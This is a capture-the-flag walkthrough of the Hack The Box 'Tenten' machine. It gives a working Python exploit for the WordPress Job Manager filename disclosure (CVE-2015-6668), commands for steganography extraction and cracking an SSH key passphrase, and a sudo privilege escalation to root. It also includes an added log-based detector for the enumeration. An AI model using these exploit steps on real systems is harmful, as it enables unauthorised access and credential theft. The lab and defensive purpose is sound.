
Hack The Box —— Tenten


Information gathering

nmap:

nmap -T4 -A -v 10.10.10.6

I found that the server had ports 22 and 80 open; browsing to the HTTP service showed a WordPress site.

Vulnerability scanning

Use wpscan to enumerate the WordPress site's themes, plugins and users:

wpscan --enumerate t --enumerate p --enumerate u --url=http://10.10.10.10/

Discovered username:

[screenshot]

Plugin vulnerability:

[screenshot]

Exploitation

Searching for Job Manager vulnerabilities shows that users can upload a CV through this plug-in. Because WordPress stores uploads under uploads/year/month/filename, the path of an uploaded CV can be brute-forced, leaking the file.

First visit Jobs Listing:

[screenshot]

Open the job details via Apply Now:

[screenshot]

[screenshot]

Change the numeric value in the URL to reach other job applications.

Use the following command to enumerate the job titles:

[screenshot]

A job application titled HackerAccessGranted shows up; try the public exploit to enumerate the CV uploaded with it:


# Python 3 port of the public CVE-2015-6668 proof of concept (the original is Python 2).
import requests

print('''
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
''')

website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')
filename2 = filename.replace(' ', '-')  # WordPress replaces spaces in upload names with dashes

# Uploads live under wp-content/uploads/<year>/<month>/, so try every
# year/month/extension combination for the guessed CV name.
for year in range(2016, 2019):
    for i in range(1, 13):
        for extension in ('php', 'html', 'pdf', 'png', 'gif', 'jpg', 'jpeg'):
            URL = website + '/wp-content/uploads/' + str(year) + '/' + '{:02}'.format(i) + '/' + filename2 + '.' + extension
            print(URL)
            req = requests.get(URL)
            if req.status_code == 200:
                print('[+] URL of CV found! ' + URL)
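The sweep above leaves a distinctive trace in the web server log: one client requesting many year/month/extension variants of the same name under wp-content/uploads and receiving mostly 404s. As an added example (not from the original post or the plugin), this detector runs over constructed Apache combined-format log lines and flags clients that fit that pattern; the thresholds, the sample IPs and the log lines are assumptions.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_RE = re.compile(r"^/wp-content/uploads/\d{4}/\d{2}/")

def find_upload_enumerators(log_text, min_requests=10, min_miss_ratio=0.8):
    """Return {ip: stats} for clients that hammer the dated uploads tree and
    mostly get 403/404 back, the signature of guessing upload filenames."""
    stats = defaultdict(lambda: {"total": 0, "misses": 0, "paths": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not UPLOAD_RE.match(m.group("path")):
            continue  # not a request into the uploads tree
        s = stats[m.group("ip")]
        s["total"] += 1
        s["paths"].add(m.group("path"))
        if m.group("status") in ("403", "404"):
            s["misses"] += 1
    flagged = {}
    for ip, s in stats.items():
        ratio = s["misses"] / s["total"]
        if s["total"] >= min_requests and ratio >= min_miss_ratio:
            flagged[ip] = {"requests": s["total"], "miss_ratio": round(ratio, 2),
                           "distinct_paths": len(s["paths"])}
    return flagged

# Constructed sample log (Apache combined format), not taken from the page:
# one client sweeps year/month/extension combinations for the same CV name
# (nine misses, one hit); another client fetches a single existing file.
_FMT = '{ip} - - [05/Sep/2019:16:19:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 209 "-" "{ua}"'
_SWEEP = [(mon, ext) for mon in (1, 2, 3) for ext in ("php", "pdf", "jpg")]
SAMPLE_LOG = "\n".join(
    [_FMT.format(ip="10.10.14.5", sec=i, status=404, ua="python-requests/2.22.0",
                 path=f"/wp-content/uploads/2016/{mon:02d}/HackerAccessGranted.{ext}")
     for i, (mon, ext) in enumerate(_SWEEP)]
    + [_FMT.format(ip="10.10.14.5", sec=9, status=200, ua="python-requests/2.22.0",
                   path="/wp-content/uploads/2017/04/HackerAccessGranted.jpg"),
       _FMT.format(ip="192.0.2.7", sec=30, status=200, ua="Mozilla/5.0",
                   path="/wp-content/uploads/2017/04/company-logo.png")]
)

if __name__ == "__main__":
    for ip, info in find_upload_enumerators(SAMPLE_LOG).items():
        print(f"[!] {ip} enumerating uploads: {info}")
```

The same per-client miss ratio can be fed to a WAF or fail2ban rule; the mitigation on the application side is to store CVs outside the web root or under a non-guessable name rather than the dated default path.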

[screenshot]

The following sensitive file was found:

[screenshot]

Visiting it returns an image.

[screenshot]

Guessing that the image carries steganographic content, run steghide extract -sf HackerAccessGranted.jpg, which yields an id_rsa file.

[screenshot]

[screenshot]

Opening the id_rsa file shows that the key is encrypted:

[screenshot]

Use the ssh2john script to convert the encrypted key into a hash that john can crack:

python2 ssh2john id_rsa ssh_login

Output:

[screenshot]

Crack the password with john:

john ssh_login --wordlist=rockyou.txt

Get the password of id_rsa: superpassword.

Try to log in to the server:

ssh -i id_rsa [email protected]

[screenshot]

Get the first flag.

Trying to enter the root directory fails for lack of permissions.

Use sudo -l to list the commands that can be run without a password:

[screenshot]

This reveals /bin/fuckin; view its contents:

[screenshot]

Execute sudo /bin/fuckin /bin/bash to obtain a root shell:

[screenshot]
